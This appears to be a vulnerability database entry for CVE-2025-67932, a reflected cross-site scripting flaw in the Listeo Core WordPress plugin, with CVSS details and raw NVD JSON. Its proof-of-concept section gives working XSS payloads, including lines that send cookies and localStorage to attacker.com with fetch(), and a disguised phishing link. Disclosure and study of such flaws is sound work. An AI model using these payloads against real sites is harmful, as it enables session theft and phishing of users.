Security Vulnerability Report
中文
CVE-2025-67932 CVSS 7.1 HIGH

CVE-2025-67932

Published: 2026-01-08 10:15:52
Last Modified: 2026-04-27 18:16:50

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in purethemes Listeo Core listeo-core allows Reflected XSS.This issue affects Listeo Core: from n/a through < 2.0.19.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Listeo Core < 2.0.19

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-67932 PoC - Reflected XSS in Listeo Core --> <!-- Target: Listeo Core plugin < 2.0.19 --> <!-- Attack Vector: Inject malicious JavaScript via URL parameter --> <!-- Method 1: Using script tag --> <a href="https://vulnerable-site.com/?search=<script>alert(document.cookie)</script>">Click Here</a> <!-- Method 2: Using img onerror handler --> <a href="https://vulnerable-site.com/?search=<img src=x onerror=alert(document.domain)>">View Listing</a> <!-- Method 3: Using svg onload handler --> <a href="https://vulnerable-site.com/?search=<svg onload=fetch('https://attacker.com/steal?c='+document.cookie)>">Special Offer</a> <!-- Full exploitation example with data exfiltration --> <script> // Construct malicious URL const vulnerableParam = '?s=<script>fetch(`https://attacker.com/log?cookie=${document.cookie}&data=${JSON.stringify(localStorage)}`)</script>'; const targetUrl = 'https://vulnerable-site.com' + vulnerableParam; // Create phishing link console.log('Malicious URL:', targetUrl); // Social engineering component - mask the URL const displayUrl = 'https://vulnerable-site.com/?s=luxury-villa-rental'; console.log('Display URL:', displayUrl); </script>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67932", "sourceIdentifier": "[email protected]", "published": "2026-01-08T10:15:52.263", "lastModified": "2026-04-27T18:16:50.357", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in purethemes Listeo Core listeo-core allows Reflected XSS.This issue affects Listeo Core: from n/a through < 2.0.19."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/listeo-core/vulnerability/wordpress-listeo-core-plugin-2-0-19-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}